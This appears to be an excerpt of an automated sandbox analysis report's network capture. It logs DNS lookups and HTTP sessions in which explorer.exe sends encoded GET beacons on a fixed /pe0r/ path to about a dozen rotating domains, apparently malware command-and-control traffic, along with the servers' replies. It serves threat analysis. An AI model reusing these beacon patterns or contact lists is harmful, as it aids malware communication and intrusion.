Apr 8, 2021 13:23:27.210115910 CEST | 192.168.2.4 | 8.8.8.8 | 0xa670 | Standard query (0) | www.lideresdeimmunocal.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 13:22:07.200592995 CEST | 8.8.8.8 | 192.168.2.4 | 0xd067 | No error (0) | www.1364kensington.com | | 66.96.161.160 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:12.511807919 CEST | 8.8.8.8 | 192.168.2.4 | 0x1d91 | Name error (3) | www.essentials-trading.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:17.701608896 CEST | 8.8.8.8 | 192.168.2.4 | 0x8094 | No error (0) | www.luegomusic.com | luegomusic.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:17.701608896 CEST | 8.8.8.8 | 192.168.2.4 | 0x8094 | No error (0) | luegomusic.com | | 162.241.244.61 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:23.711600065 CEST | 8.8.8.8 | 192.168.2.4 | 0xa149 | No error (0) | www.kf350.com | | 107.178.142.156 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:29.453022957 CEST | 8.8.8.8 | 192.168.2.4 | 0xdeb5 | Name error (3) | www.hzmsbg.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:34.608465910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1013 | Name error (3) | www.quickeasybites.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:44.780318975 CEST | 8.8.8.8 | 192.168.2.4 | 0x1d30 | No error (0) | www.pierresplayhouse.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | www.thecapitalhut.com | www11.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | www11.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:55.218827963 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb00 | No error (0) | www.ssfgasia.com | ssfgasia.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:55.218827963 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb00 | No error (0) | ssfgasia.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:00.417926073 CEST | 8.8.8.8 | 192.168.2.4 | 0xa297 | No error (0) | www.desertfoxindustries.com | desertfoxindustries.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:23:00.417926073 CEST | 8.8.8.8 | 192.168.2.4 | 0xa297 | No error (0) | desertfoxindustries.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:06.521147013 CEST | 8.8.8.8 | 192.168.2.4 | 0x7cc0 | No error (0) | www.tennesseewheelrepair.com | tennesseewheelrepair.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:23:06.521147013 CEST | 8.8.8.8 | 192.168.2.4 | 0x7cc0 | No error (0) | tennesseewheelrepair.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.36.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.32.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.34.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.38.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:22.195578098 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:23.204312086 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:24.221883059 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:26.237104893 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:27.627649069 CEST | 8.8.8.8 | 192.168.2.4 | 0xa670 | Server failure (2) | www.lideresdeimmunocal.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.1364kensington.com
• www.luegomusic.com
• www.kf350.com
• www.pierresplayhouse.com
• www.thecapitalhut.com
• www.ssfgasia.com
• www.desertfoxindustries.com
• www.tennesseewheelrepair.com
• www.rootedwithlovejax.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49751 | 66.96.161.160 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 13:22:07.319251060 CEST | 1216 | OUT | GET /pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0 HTTP/1.1
Host: www.1364kensington.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Apr 8, 2021 13:22:07.443166971 CEST | 1217 | IN | HTTP/1.1 404 Not Found
Date: Thu, 08 Apr 2021 11:22:07 GMT
Content-Type: text/html
Content-Length: 867
Connection: close
Server: Apache/2
Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
Accept-Ranges: bytes
Accept-Ranges: bytes
Age: 0
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      1192.168.2.449764162.241.244.6180C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Apr 8, 2021 13:22:17.851991892 CEST2104OUTGET /pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.luegomusic.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:18.669209003 CEST | 2105 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:17 GMT
                                                                      Server: Apache
                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                      X-Redirect-By: WordPress
                                                                      Upgrade: h2,h2c
                                                                      Connection: Upgrade, close
                                                                      Location: http://luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0
                                                                      host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                      X-Endurance-Cache-Level: 0
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=UTF-8


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      2 | 192.168.2.4 | 49770 | 107.178.142.156 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:22:23.881720066 CEST | 2159 | OUT | GET /pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.kf350.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:27.418097019 CEST | 6582 | IN | HTTP/1.1 200 OK
                                                                      Date: Thu, 08 Apr 2021 11:22:35 GMT
                                                                      Content-Length: 331
                                                                      Content-Type: text/html
                                                                      Server: Microsoft-IIS/7.5
                                                                      Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e b9 d9 cd f8 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      3 | 192.168.2.4 | 49771 | 199.59.242.153 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:22:44.892147064 CEST | 6584 | OUT | GET /pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.pierresplayhouse.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:45.002899885 CEST | 6585 | IN | HTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ==
                                                                      Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 76 46 4f 2b 51 61 30 52 30 6d 6f 77 4a 61 73 4c 51 54 53 6e 52 76 57 61 47 55 69 43 38 54 67 52 52 35 62 74 38 56 30 33 74 6c 41 31 6f 30 55 76 2f 5a 6e 76 77 4b 37 31 47 78 39 39 69 52 44 7a 33 6a 45 65 77 63 47 45 48 51 51 74 4a 43 41 4a 61 68 4d 66 51 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 
2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                      Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fvFO+Qa0R0mowJasLQTSnRvWaGUiC8TgRR5bt8V03tlA1o0Uv/ZnvwK71Gx99iRDz3jEewcGEHQQtJCAJahMfQ=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head><!--[if IE 6 ]><body class="ie6"><![endif]--><!--[if IE 7 ]><body class="ie7"><![endif]--><!--[if IE 8 ]><body class="ie8"><![endif]--><!--[if IE 9 ]><body class="ie9"><![endif]--><!--[if (gt IE 9)|!(IE)]> --><body><!--<![endif]--><script type="text/javascript">g_pb=(function(){var DT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      4 | 192.168.2.4 | 49772 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:22:50.107975006 CEST | 6590 | OUT | GET /pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.thecapitalhut.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:50.173912048 CEST | 6591 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Date: Thu, 08 Apr 2021 11:22:50 GMT
                                                                      Content-Length: 0
                                                                      Connection: close
                                                                      location: https://www.thecapitalhut.com/pe0r?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0
                                                                      strict-transport-security: max-age=120
                                                                      x-wix-request-id: 1617880970.125913965966121268
                                                                      Age: 0
                                                                      Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                      X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVgmNySqidgeEPHXBvm3U9iS,qquldgcFrj2n046g4RNSVPYxV603IO64T3vEIZzS9F0=,2d58ifebGbosy5xc+FRalh3hwieZdjPl8CZNSQhfEynGR4aF8yrGttME1Z/doJQd3fKEXQvQlSAkB/lstal9R73i9xLAFDBM1sgnz44DHz8=,2UNV7KOq4oGjA5+PKsX47NdwL56oCSUGh+LISE2KX3A=,sqmudy1rWy5CXemzdhzS/IdY/BHPTlKnJIetyMef762TzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,k4IrXgMmYJ2VF1cp9wAw75WSI3OLjEFdjvyrPhumLIdLrTe66AYUmhbsk95nB1oVKjCWKapddFlOEEDxcGowaw==
                                                                      Cache-Control: no-cache
                                                                      Server: Pepyaka/1.19.0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      5 | 192.168.2.4 | 49774 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:22:55.232578993 CEST | 6600 | OUT | GET /pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.ssfgasia.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:22:55.347368956 CEST | 6601 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 08 Apr 2021 11:22:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "6061898c-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      6 | 192.168.2.4 | 49776 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:23:00.599381924 CEST | 6612 | OUT | GET /pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.desertfoxindustries.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:00.805794001 CEST | 6612 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:00 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: http://www.etsy.com/shop/DesertFoxIndustries?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0
                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      7 | 192.168.2.4 | 49777 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Apr 8, 2021 13:23:06.701818943 CEST | 6613 | OUT | GET /pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0 HTTP/1.1
                                                                      Host: www.tennesseewheelrepair.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
                                                                      Apr 8, 2021 13:23:06.904542923 CEST | 6613 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.16.1
                                                                      Date: Thu, 08 Apr 2021 11:23:06 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Location: https://musiccityrecon.com/wheel-repair.htm?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0
